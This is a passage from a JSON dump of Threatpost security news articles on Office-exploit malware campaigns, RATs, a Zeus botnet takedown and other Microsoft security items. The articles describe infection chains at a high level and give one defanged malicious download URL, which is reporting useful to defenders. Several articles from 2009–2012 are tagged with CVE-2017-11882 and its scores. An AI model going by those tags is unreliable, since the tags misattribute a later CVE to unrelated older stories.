code execution found in Microsoft Word ([CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>)) and one notably being [the now patched April 2017 zero-day bug](<https://threatpost.com/microsoft-patches-word-zero-day-spreading-dridex-malware/124906/>) ([CVE-2017-0199](<https://threatpost.com/microsoft-patches-three-vulnerabilities-under-attack/124927/>)).\n\n\u201cIn October 2018, [we] identified a new version of ThreadKit. As per Cobalt Group\u2019s typical methods, the malware was delivered via phishing email, containing a RFT Microsoft Office attachment which contained an evolved version of the exploit builder kit first uncovered in October 2017,\u201d according to Fidelis. \u201c[This] new version of ThreadKit [utilizes] a macro delivery framework sold and used by numerous actors and groups.\u201d\n\nFidelis\u2019 latest analysis of the ThreadKit also notes \u201ca slight evolution\u201d in the exploit kit designed to better hide from detection. Obfuscation techniques include \u201cplacing the \u2018M\u2019 from the \u2018MZ\u2019 of an executable file into it\u2019s own object and now renaming a number of the objects inside.\u201d\n\nFidelis also pointed out the update including a new download URL where the malware code \u201cobjects\u201d are downloaded from and later combined to create the executable. \u201cA few highlights from the embedded files shows a check for block.txt, which is similar to the previous version\u2019s kill-switch implementation,\u201d Reaves wrote.\n\n**CobInt Adopts New Obfuscation Skills **\n\nThe ThreadKit payload is the trojan Coblnt, a longtime favorite of the Cobalt Group. To further frustrate analysis and detection, the attackers added another layer of obfuscation, a XOR routine used to decode the initial Coblnt payload. A XOR, or XOR cipher, is an encryption algorithm that operates on a set of known principles. Encryption and decryption can be performed by applying and reapplying the XOR function.\n\n\u201cWhat\u2019s interesting here is that the XOR key is replaced by the subtraction value and the subtraction value is replaced by the previously read DWORD value. So the only value that\u2019s needed is the hardcoded XOR key, meaning mathematically this entire thing can be solved using a theorem prover such as Z3,\u201d researchers pointed out.\n\nThe decoded payload is the CobInt DLL, which when loaded will \u201csit in a loop beaconing to its C2 and waiting for commands and modules to be executed,\u201d according to Fidelis.\n\nFidelis and other researchers say the arrest of Cobalt group members have only temporarily slowed Carbanak/Cobalt threat actors. In a recent analysis by Kaspersky Lab, researchers said Cobalt arrests have only emboldened members and hastened the process of [splitting the groups into smaller cells](<https://securelist.com/ksb-cyberthreats-to-financial-institutions-2019-overview-and-predictions/88944/>).\n", "cvss3": {}, "published": "2018-12-11T18:40:00", "type": "threatpost", "title": "Cobalt Group Pushes Revamped ThreadKit Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-12-11T18:40:00", "id": "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "href": "https://threatpost.com/cobalt-threadkit-malware/139800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-20T13:38:19", "description": "An APT described as a \u201clone wolf\u201d is exploiting a decades-old Microsoft Office flaw to deliver a barrage of commodity RATs to organizations in India and Afghanistan, researchers have found.\n\nAttackers use political and government-themed malicious domains as lures in the campaign, which targets mobile devices with out-of-the-box RATs such as dcRAT and [QuasarRAT](<https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/>) for Windows and AndroidRAT. They\u2019re delivering the RATs in malicious documents by exploiting [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2017-11882>), according to a [report published Tuesday](<https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) by Cisco Talos. \n\nThe threat group \u2013 tracked by Cisco Talos from the beginning of the year through the summer \u2013 disguises itself behind a front that seems legitimate, posing as a Pakistani IT firm called Bunse Technologies, researchers said.\n\nCVE-2017-11882 is a more than 20-year-old memory corruption vulnerability in Microsoft Office that persisted for 17 years before the company [patched it](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017. However, as recently [as two years ago](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>), attackers were seen exploiting the bug, which allows them to run malicious code automatically without requiring user interaction.\n\nThe advanced persistent threat (APT) behind the campaign also uses a custom file enumerator and infector in the reconnaissance phase of the two-step attack, followed by a second phase added in later versions of the campaign that deploys the ultimate RAT payload, researchers said.\n\nTo host the malware payloads, the threat actor registered multiple domains with political and government themes used to fool victims, particularly ones linked to diplomatic and humanitarian efforts in Afghanistan to target entities in that country, researchers said.\n\n\u201cThis campaign is a classic example of an individual threat actor employing political, humanitarian and diplomatic themes in a campaign to deliver commodity malware to victims\u201d \u2013 in this case, RATs \u201cpacked with multiple functionalities to achieve complete control over the victim\u2019s endpoint,\u201d Cisco Talos\u2019 Asheer Malhotra wrote in the post. \n\n## **Out-of-the-Box Benefits**\n\nThe campaign reflects an increased trend by both cybercriminals and APTs to use commodity RATs instead of custom malware against victims for a number of reasons, researchers said.\n\nUsing commodity RATs gives attackers a range of out-of-the-box functionality, including preliminary reconnaissance capabilities, arbitrary command execution and data exfiltration, researchers noted. The RATs also \u201cact as excellent launch pads for deploying additional malware against their victims,\u201d Malhotra wrote.\n\nUsing commodity malware also saves attackers both the time and resource investment in developing custom malware, as the RATs have stock features requiring minimal configuration changes, researchers said.\n\nIn their post, researchers broke down the two-stage attack process as well as the specifics of each RAT they observed attackers using in the campaign. RAT functionality varies depending on the payload, they said, but generally includes capabilities such as remote shells, process management, file management, keylogging, arbitrary command execution and credential stealing.\n\n## **Initial Infection and Reconnaissance**\n\nThe infection chain consists of a reconnaissance phase that starts with malicious RTF documents and PowerShell scripts that ultimately distribute malware to victims. \n\nSpecifically, the threat actor uses the RTF to exploit the Office bug and execute a malicious PowerShell command that extracts and executes the next-stage PowerShell script. That script then base64 decodes another payload \u2013 in the case researchers observed, it was a loader executable \u2013 and activates it on the infected endpoint, Malhotra wrote.\n\nThe loader executable begins by establishing persistence for itself using a shortcut in the current user\u2019s Startup directory and then compiles hardcoded C# code into an executable assembly. It then invokes the entry point for the compiled malicious code \u2013 the previously mentioned custom file enumerator and infector \u2013 researchers found.\n\nThis C# code \u2013 which is the final payload in the reconnaissance phase \u2013 contains the file enumerator, which lists specific file types on the endpoint and sends the file paths to the command-and-control (C2) server along with file infector modules, which are different than typical executable infectors usually seen in the wild, Malhotra noted.\n\n\u201cThese modules are used for infecting benign Office documents with malicious OLE objects to weaponize them to exploit CVE-2017-11882,\u201d he wrote.\n\n## **Attack Phase**\n\nResearchers observed attackers switching up tactics to deploy commodity RATs as the final payload starting in July, they said. \n\nTo do this, attackers tweaked the reconnaissance process slightly to leverage the second-stage PowerShell script to create a BAT file on disk, researchers said. That file, in turn, would execute another PowerShell command to download and activate the RAT payload on the infected endpoint, retrieving it from one of the sites attackers set up. \n\u201cSo far, we\u2019ve observed the delivery of three types of payloads from the remote locations discovered in this phase of the campaign: DcRAT, QuasarRAT and a legitimate copy of the remote desktop client AnyDesk,\u201d Malhotra wrote.\n\nThe use of the last payload \u201cindicates a focus on manual operations where the actor would have logged into the infected devices to discern if the access was of any value,\u201d according to the writeup.\n\nAll in all, the tactics of the APT used in the campaign demonstrate \u201caggressive proliferation\u201d as the goal, as the use of out-of-the-box malware combined with customized file infections gives them a straightforward point of entry onto a victim\u2019s network, Malhotra observed.\n\n\u201cOrganizations should remain vigilant against such threats that are highly motivated to proliferate using automated mechanisms,\u201d he wrote.\n\nHowever, it seems likely that the group will eventually abandon its use of commodity malware for its own bespoke tools, which means there will probably be more threat campaigns in its future, researchers said.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-20T13:28:13", "type": "threatpost", "title": "\u2018Lone Wolf\u2019 APT Uses Commodity RATs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-10-20T13:28:13", "id": "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "href": "https://threatpost.com/apt-commodity-rats-microsoft-bug/175601/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-01-23T05:27:45", "description": "Typically, inbox-based attacks that include malicious Microsoft Office attachments require adversaries to trick users into enabling macros. But researchers say they have identified a new malicious email campaign that uses booby-trapped Office attachments that are macro-free.\n\nThe attacks do not generate the same type of default warning from Microsoft associated with macro-based attacks, according to research published Wednesday by [Trustwave\u2019s SpiderLabs](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Multi-Stage-Email-Word-Attack-without-Macros/>). When opening attachments, there are no warnings or pop-ups alerting victims, researchers said.\n\nThe attack uses malicious Word attachments that activate a four-stage infection process that ultimately exploits the [Office Equation Editor vulnerability](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), patched last year by Microsoft. The payload is designed to steal credentials from the victim\u2019s email, FTP and browsers.\n\nResearchers emphasized the layered nature of the attack, comparing it to a turducken, a holiday dish that stuffs a chicken into a duck, and then into a turkey.\n\n\u201cThis \u2018turducken\u2019 attack really exploits CVE-2017-11882 in the end to obtain code execution,\u201d Trustwave researchers told Threatpost in an email response to questions. Systems that have patched for CVE-2017-11882 are not vulnerable.\n\nResearchers at Trustwave said the malware infection string uses a combination of techniques that start with a .DOCX formatted attachment. The spam originates from for the Necurs botnet. Email subject lines fall into four financially related categories: \u201cTNT STATEMENT OF ACCOUNT\u201d, \u201cRequest for Quotation\u201d, \u201cTelex Transfer Notification\u201d and \u201cSWIFT COPY FOR BALANCE PAYMENT\u201d. All of the emails examined by SpiderLabs researchers had the attachment named \u201creceipt.docx\u201d.\n\n**The Turducken Attack**\n\nThe four-stage infection process begins when the .DOCX file is opened and triggers an embedded OLE (Object Linking and Embedding) object that contains external references.\n\n\u201cThis \u2018feature\u2019 allows external access to remote OLE objects to be referenced in the document.xml.rels,\u201d describes researchers.\n\nAccording to SpiderLabs, attackers are taking advantage of the fact that Word (or .DOCX formatted) documents created using Microsoft Office 2007 use the \u201c[Open XML Format](<https://msdn.microsoft.com/en-us/library/bb448854\\(v=office.12\\).aspx>)\u201c. The format is based on XML and ZIP archive technologies and can easily be manipulated programmatically or manually, said researchers.\n\nStage two includes the .DOCX file triggering the download of an RTF (rich text file format) file.\n\n\u201cWhen user opens the DOCX file, it causes a remote document file to be accessed from the URL: hxxp://gamestoredownload[.]download/WS-word2017pa[.]doc. This is actually a RTF file that is downloaded and executed,\u201d researchers describe.\n\n**Equation Editor Exploited**\n\nIt\u2019s the RTF file that exploits the Office Equation Editor vulnerability (CVE-2017-11882). In November, Microsoft patched the vulnerability. The Microsoft Equation Editor is installed by default with the Office suite. The application is used to insert and edit complex equations as OLE items in Microsoft Word documents.\n\nStage three includes the decoding of text inside the RTF file that in turn triggers a MSHTA command line that downloads and executes an HTML executable HTA file. Next the HTA contains an obfuscated PowerShell Script which eventually downloads and executes the remote payload \u2013 the Password Stealer Malware.\n\n\u201cThe malware steals credentials from email, ftp, and browser programs by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist,\u201d said researchers.\n\nResearchers note the number of stages and vectors used in these attacks is unusual. \u201cAnother noticeable point is that the attack uses file types (DOCX, RTF and HTA), that are not often blocked by email or network gateways unlike the more obvious scripting languages like VBS, JScript or WSF,\u201d researchers noted. \u201cIn the end, be wary of unknown or unexpected Office documents and keep your patches up to date.\u201d\n", "cvss3": {}, "published": "2018-02-15T12:31:26", "type": "threatpost", "title": "Word-based Malware Attack Doesn\u2019t Use Macros", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-02-15T12:31:26", "id": "THREATPOST:B4579714760429B9531FF0E79E44C578", "href": "https://threatpost.com/word-based-malware-attack-doesnt-use-macros/129969/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "[](<https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/>)There is a newly discovered vulnerability in both Internet Explorer 6 and Internet Explorer 7 that could enable an attacker to take complete control of a vulnerable machine.\n\nThe vulnerability is the result of a dangling pointer in IE and there is a working exploit for the flaw circulating online. The flaw lies in the way that Internet Explorer handles CSS data. [CSS](<http://www.w3.org/Style/CSS/>) is a technology that\u2019s used in many sites to help present information in an organized manner. Specifically, the vulnerability is in the mshtml.dll, the Microsoft HTML Viewer.\n\nAccording to an [analysis by Vupen Security](<http://www.vupen.com/english/advisories/2009/3301>), an attacker could exploit the flaw either to crash a vulnerable version of IE, or to run arbitrary code on the user\u2019s machine. There is no patch available for the vulnerability. The SANS Internet Storm Center also has an analysis up.\n\nA vulnerability has been identified in Microsoft Internet Explorer, \nwhich could be exploited by attackers to compromise a vulnerable \nsystem. This issue is caused by a dangling pointer in the Microsoft \nHTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via \nthe \u201cgetElementsByTagName()\u201d method, which could allow attackers to \ncrash an affected browser or execute arbitrary code by tricking a user \ninto visiting a malicious web page.\n\nAn [exploit for the vulnerability in IE](<http://www.securityfocus.com/archive/1/507984/30/0/threaded>) was published on the Bugtraq mailing list Friday, but experts say it is not very reliable at this point. However, the level of detail included in the Bugtraq post will likely lead to the release of a more reliable exploit soon. In lieu of a patch, users should disable JavaScript in IE to prevent exploitation.\n\nMicrosoft has not yet published any advisories on the new IE vulnerability.\n", "cvss3": {}, "published": "2009-11-22T21:47:10", "type": "threatpost", "title": "New Zero-Day Flaw Discovered in IE7", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:05:16", "id": "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "href": "https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/73151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:49", "description": "[](<https://threatpost.com/microsoft-releases-new-regex-fuzzer-101310/>)Microsoft has released a new fuzzing tool designed specifically to find mistakes in regular expressions in application code that could be vulnerable to attack. The [SDL Regex Fuzzer](<https://www.microsoft.com/downloads/en/details.aspx?FamilyID=8737519c-52d3-4291-9034-caa71855451f>) identifies problematic lines that might cause an application to be susceptible to attacks that consume huge amounts of resources and cause denial-of-service conditions.\n\nThe new fuzzer is meant to be used specifically to find vulnerable regular expressions in application code that could lead to a special kind of attack known as a ReDoS. Microsoft officials say that as more and more applications are moved to cloud providers, attackers will begin to focus their attention on those applications in new and profitable ways.\n\n\u201cI\u2019ve [predicted](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) before that as cloud computing gains wider adoption, we\u2019ll start to see a significant increase in denial of service (DoS) attacks against those services. When you\u2019re paying for the processor time, bandwidth and storage that your applications use, attacks that explicitly target and consume those resources can get very expensive very quickly, not to mention the costs of downtime for legitimate users. Attackers will shift from pursuing elusive privilege elevation vulnerabilities to simply blackmailing SaaS providers: pay me $10,000 or I\u2019ll make your app consume $20,000 worth of server resources,\u201d Microsoft\u2019s Bryan Sullivan wrote in a blog post explaining the SDL Regex Fuzzer.\n\nAs Sullivan explains in an [article](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) on the problem from earlier this year, a small change to an input string can cause major problems for a regular expression engine.\n\n\u201cHere is where things get \u2018interesting\u2019 (as in horribly dangerous). \nInstead of just checking that the next character after 5 is not the end \nof the string, the engine treats the next character, 6, as a new capture \ngroup and starts rechecking from there. Once that route fails, it backs \nup to 1234 and then tries 56 as a separate capture group, then 5 and 6 \neach as separate capture groups. The end result is that the engine \nactually ends up evaluating 32 different paths,\u201d he wrote. \n\n\u201cIf we now add just \none more numeric character to the evaluation string, the engine will \nhave to evaluate 64 paths\u2014twice as many\u2014to determine that it\u2019s not a \nmatch. This is an exponential increase in the amount of work being \nperformed by the regex engine. An attacker could provide a relatively \nshort input string\u201430 characters or so\u2014and force the engine to process \nhundreds of millions of paths, tying it up for hours or days.\u201d\n\nThe new fuzzer is free to download.\n", "cvss3": {}, "published": "2010-10-13T18:08:57", "type": "threatpost", "title": "Microsoft Releases New Regex Fuzzer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:20:31", "id": "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "href": "https://threatpost.com/microsoft-releases-new-regex-fuzzer-101310/74571/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:28", "description": "[](<https://threatpost.com/microsoft-financial-groups-execute-takedown-zeus-botnet-servers-032612/>)Microsoft has gone after another botnet, this time targeting some of the command-and-control infrastructure behind the Zeus network with a takedown effort that included seizing two IP addresses used for C&amp;C servers and filing suit against 39 unnamed defendants. The action against Zeus is the latest in a string of such moves by Microsoft and some of its partners against the operators of botnets such as [Kelihos](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>) and [Waledac](<https://threatpost.com/waledac-botnet-now-completely-crippled-experts-say-031610/>).\n\nZeus is one of the more widespread and well-known pieces of malware to appear in the last five years and is among the new breed of tools that\u2019s sold in various forms to anyone who can pay the freight. The Zeus kit enables an attacker to monitor a user\u2019s actions on a compromised machine, steal credentials for online banking or other valuable sites and then rack up huge profits. Like other major botnets operating right now, the Zeus network is not one botnet but dozens and dozens of individual networks operated by various criminals around the world. \n\nMicrosoft\u2019s anti-Zeus operation resulted in the takedown of two C&amp;C servers that are used in the global Zeus network, but the company\u2019s officials say they have no illusions that this move will cripple the entire Zeus system. \n\n\u201cWe don\u2019t expect this action to have wiped out every Zeus botnet operating in the world. However, together, we have proactively disrupted some of the most harmful botnets, and we expect this effort will significantly impact the cybercriminal underground for quite some time. Cybercriminals are in this for the money and this action was an unprecedented strike against the illicit infrastructure on which they rely. The operation will help further investigations against those responsible for the threat and help us better protect victims,\u201d Richard Domingues Boscovich, a senior attorney in Microsoft\u2019s Digital Crimes Unit, wrote in an analysis of the [Zeus botnet takedown](<http://blogs.technet.com/b/microsoft_blog/archive/2012/03/25/microsoft-and-financial-services-industry-leaders-target-cybercriminal-operations-from-zeus-botnets.aspx>).\n\nLast Monday, Microsoft [filed suit in the Eastern District of New York](<http://www.zeuslegalnotice.com/>) against the unnamed defendants, saying that they, using various aliases and handles, had operated the Zeus botnet. The company, along with the National Automated Clearing House Association, asked the court for permission to cut off the C&amp;C infrastructure of Zeus and also asked that the case be temporarily sealed in order to preserve the element of surprise against the suspects. The court granted both requests, and on Friday officials from Microsoft, NACHA and the Financial Services Information Sharing Analysis Center went with U.S. Marshals to execute the seizure of the servers.\n\n\u201cOn March 23, Microsoft, FS-ISAC and NACHA \u2013 escorted by the U.S. Marshals \u2013 successfully executed a coordinated physical seizure of command and control servers in two hosting locations to seize and preserve valuable data and virtual evidence from the botnets for the case. We took down two IP addresses behind the Zeus \u2018command and control\u2019 structure. Microsoft also currently monitors 800 domains secured in the operation, which helps us to identify thousands of Zeus-infected computers,\u201d Boscovich said. \n\nThe botnets affected by the Zeus takedown action include some running the Ice-IX and SpyEye variants of the malware. The Zeus codebase has forked and evolved over time and some features of the once-competitive SpyEye toolkit were included in some versions recently.\n\nIn an interesting twist to the takedown, Microsoft and the other plaintiffs in the case decided to use the civil section of the RICO statute to go after the group of defendants, allowing them to group the alleged botnet controllers under the umbrella of one organized criminal enterprise. The statute typically is used in organized crime prosecutions, but the nature of the Zeus operation lent itself to the same kind of action.\n\n\u201cUpon information and belief, John Does 1-39 constitute a group of persons associated together for a common purpose of engaging in a course of conduct, as part of an ongoing organization, with the various associates functioning as a continuing unit. The Defendants\u2019 enterprise has a purpose, with relationships among those associated with the enterprise, and longevity sufficient to permit those associates to pursue the enterprise\u2019s purpose. Upon information and belief, Defendants John Doe 1, John Doe 2, and John Doe 3 conspired to, and did, form an associated in fact enterprise (herein after the \u201cZeus Racketeering Enterprise\u201d) with a common purpose of developing and operating a global credential stealing botnet operation as set forth in detail herein,\u201d the complaint filed against the botnet operators says. \n\n\u201cBoth the purpose of the Zeus Racketeering Enterprise and the relationship between the Defendants is proven by: (1) the consolidation of the original Zeus botnet and the SpyEye botnet; (2) the subsequent development and operation of the enhanced Ice-IX botnet; and (3) Defendants\u2019 respective and interrelated roles in the sale, operation of, and profiting from the Zeus Botnets in furtherance of Defendants\u2019 common financial interests.\u201d\n\nMicrosoft\u2019s Boscovich said the use of RICO was an important aspect of the case.\n\n\u201cIn criminal court cases, the RICO Act is often associated with cases against organized crime; the same is true in applying the civil section of the law to this case against what we believe is an organization of people behind the Zeus family of botnets. By incorporating the use of the RICO Act, we were able to pursue a consolidated civil case against everyone associated with the Zeus criminal operation, even if those involved in the \u2018organization\u2019 were not necessarily part of the core enterprise,\u201d he said.\n", "cvss3": {}, "published": "2012-03-26T12:05:14", "type": "threatpost", "title": "Microsoft, Financial Groups Execute Takedown of Zeus Botnet Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:34", "id": "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "href": "https://threatpost.com/microsoft-financial-groups-execute-takedown-zeus-botnet-servers-032612/76364/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:45", "description": "[](<https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/>)\n\nDennis Fisher talks with Microsoft\u2019s Adam Shostack about the [Privacy Enhancing Technologies Symposium](<http://petsymposium.org/2009/program.php>), the definition of privacy in today\u2019s world and the role of technology in helping to enhance and protect that privacy.\n\nShow notes: Adam\u2019s [blog post on \u201cUnderstanding Privacy\u201d](<http://www.emergentchaos.com/archives/2008/08/solves_understanding_priv.html>) by Dan Solove.\n\nMicrosoft\u2019s [Privacy Guidelines for Developing Software Products and Services](<http://www.microsoft.com/downloads/details.aspx?FamilyId=C48CF80F-6E87-48F5-83EC-A18D1AD2FC1F&displaylang=en>).\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_261.mp3>)\n\nSubscribe to the Digital Underground podcast on [****](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-08-13T20:34:53", "type": "threatpost", "title": "Adam Shostack on Privacy and the PETS '09 Workshop", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "href": "https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/72968/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:26", "description": "Microsoft has announced plans to give away free versions of its COFEE (Computer Online Forensic Evidence Extractor) utility to help law enforcement agencies in cyber-crime investigations. \n\nCOFEE uses digital forensic technologies to help investigators gather evidence of live computer activity at the scene of a crime, regardless of technical expertise. \n \nLaw enforcement agents with less than 10 minutes training can capture live evidence of illegal activity by inserting the COFEE USB device into a computer. \n\nThe evidence is then preserved for analysis, protecting it from being destroyed when the computer is turned off for moving. \n\nMicrosoft explains:\n\n> A common challenge of cybercrime investigations is the need to conduct forensic analysis on a computer before it is powered down and restarted. Live evidence, such as some active system processes and network data, is volatile and may be lost while a computer is turning off. This evidence may contain information that could assist in the investigation and prosecution of a crime. With COFEE, a front-line officer doesn\u2019t have to be a computer expert to capture this volatile information before turning off the computer on the scene for later analysis. An officer with minimal computer experience can be tutored to use a pre-configured COFEE device in less than 10 minutes. This enables him or her to take advantage of common digital forensics tools the experts use to gather important volatile evidence while doing little more than simply inserting a USB device into the computer.\n\n[Read the full announcement](<http://www.microsoft.com/presspass/press/2009/oct09/10-13cofeepr.mspx>) [microsoft.com] \n", "cvss3": {}, "published": "2009-10-19T18:59:24", "type": "threatpost", "title": "Free COFEE Helps Law Enforcement Forensics", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:24:46", "id": "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "href": "https://threatpost.com/free-cofee-helps-law-enforcement-forensics-101909/72343/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-02-09T19:52:36", "description": "A newly discovered variant of the LodaRAT malware, which has historically targeted Windows devices, is being distributed in an ongoing campaign that now also hunts down Android devices and spies on victims.\n\nAlong with this, an updated version of LodaRAT for Windows has also been identified; both versions were seen in a recent campaign targeting Bangladesh, researchers said.\n\nThe campaign reflects an overarching shift in strategy for LodaRAT\u2019s developers, as the attack appears to be driven by espionage rather than its previous financial goals. While previous versions of LodaRAT contained credential-stealing capabilities that researchers speculated were used for draining victims\u2019 bank accounts, these newer versions come with a full roundup of information-gathering commands.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe fact that the threat group has evolved into hybrid campaigns targeting Windows and Android shows a group that is thriving and evolving,\u201d said researchers with Cisco Talos, [on Tuesday](<https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html>). \u201cAlong with these improvements, the threat actor has now focused on specific targets, indicating more mature operational capabilities. As is the case with earlier versions of Loda, both versions of this new iteration pose a serious threat, as they can lead to a significant data breach or heavy financial loss.\u201d\n\n## **What is the LodaRAT Malware?**\n\nLodaRAT, [first discovered](<https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware>) in September 2016, is a remote access trojan (RAT) that comes with a variety of capabilities for spying on victims, such as recording the microphones and webcams of victims\u2019 devices. The name \u201cLoda\u201d is derived from a directory to which the malware author chose to write keylogger logs.\n\nSince its discovery in 2016 the RAT has proliferated, with multiple new versions being spotted in the wild [as recently as September](<https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html>). The RAT, which is written in AutoIT, appears to be distributed by multiple cybercrime groups that have been using it to target numerous verticals.\n\n## **Recent LodaRAT Cyberattack in Bangladesh**\n\nResearchers observed a campaign involving LodaRAT that began in October and is still active. The attackers appear to have a specific interest in Bangladesh-based organizations, including banks and carrier-grade voice-over-IP (VoIP) software vendors.\n\nVitor Ventura, Cisco Talos\u2019 technical lead and senior security researcher, told Threatpost that the initial attack vectors for the campaign involved emails sent to victims with links to malicious applications (involving both the Windows and Android versions) or malicious documents (involving just the Windows version).\n\n\u201cThe campaign uncovered targeting Bangladesh used different levels of lures, from type squatted domains, to file names directly linked to products or services of their victims,\u201d said researchers.\n\nFor the Windows-targeting maldoc attack, after the victim clicked on the malicious documents, attackers used a malicious RTF document, which exploits CVE-2017-11882 ([a remote code-execution vulnerability](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>) existing in Microsoft Office) in order to then download LodaRAT.\n\n## **LodaRAT\u2019s New Android Variant **\n\nThe Android version of the LodaRAT malware, which researchers call \u201cLoda4Android,\u201d is \u201crelatively simple when compared to other Android malware,\u201d said researchers. For instance, the RAT has specifically avoided techniques often used by Android banking trojans, such as [leveraging the Accessibility APIs,](<https://threatpost.com/android-overlay-and-accessibility-features-leave-millions-at-risk/125888/>) in order to steal data.\n\nThe underlying command-and-control (C2) protocol follows the same design pattern as the Windows version, said researchers \u2013 suggesting that the C2 code will be able to handle both versions.\n\nAlso, Loda4Android has \u201call the components of a stalker application\u201d said researchers. The malware collects location data and records audio, and can take photos and screenshots.\n\n\u201cIt can record audio calls, but it will only record what the victim says but not what the counterpart says,\u201d said researchers. \u201cThe common SMS, call log and contact exfiltration functionalities are also present. It is interesting to note that it\u2019s not capable of intercepting the SMS or the calls, like it\u2019s usually seen in banker trojans.\u201d\n\n## **Fresh Windows Loda Version**\n\nThe new version of the LodaRAT that targets Windows systems is version 1.1.8. While it\u2019s mostly the same as previous versions, new commands have been added that extend its capabilities.\n\nFor one, the version comes with new commands that give the threat actor remote access to the target machine via [the Remote Desktop Protocol](<https://threatpost.com/threat-actors-can-exploit-windows-rdp-servers-to-amplify-ddos-attacks/163248/>) (RDP). The new version can now leverage the BASS audio library to capture audio from a connected microphone. 